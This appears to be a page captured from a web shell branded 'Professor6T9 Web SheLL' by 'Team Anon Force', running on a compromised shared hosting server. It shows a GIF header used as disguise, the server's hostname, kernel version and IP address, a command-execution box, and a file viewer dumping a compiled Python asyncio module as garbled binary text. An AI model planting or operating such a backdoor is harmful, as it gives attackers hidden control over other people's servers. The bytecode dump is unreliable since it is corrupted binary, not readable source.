GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
proc
/
thread-self
/
root
/
opt
/
alt
/
python35
/
lib64
/
python3.5
/
asyncio
/
__pycache__
[ HOME ]
Exec
Submit
File Name : locks.cpython-35.pyc
��Yf�: � @ s� d Z d d d d d g Z d d l Z d d l m Z d d l m Z d d l m Z d d l m Z Gd d � d � Z Gd d � d � Z Gd d � d e � Z Gd d � d � Z Gd d � d e � Z Gd d � d e � Z Gd d � d e � Z d S)zSynchronization primitives.�Lock�Event� Condition� Semaphore�BoundedSemaphore� N� )�compat)�events)�futures)� coroutinec @ s: e Z d Z d Z d d � Z d d � Z d d � Z d S) �_ContextManagera Context manager. This enables the following idiom for acquiring and releasing a lock around a block: with (yield from lock): <block> while failing loudly when accidentally using: with lock: <block> c C s | | _ d S)N)�_lock)�self�lock� r �2/opt/alt/python35/lib64/python3.5/asyncio/locks.py�__init__ s z_ContextManager.__init__c C s d S)Nr )r r r r � __enter__ s z_ContextManager.__enter__c G s"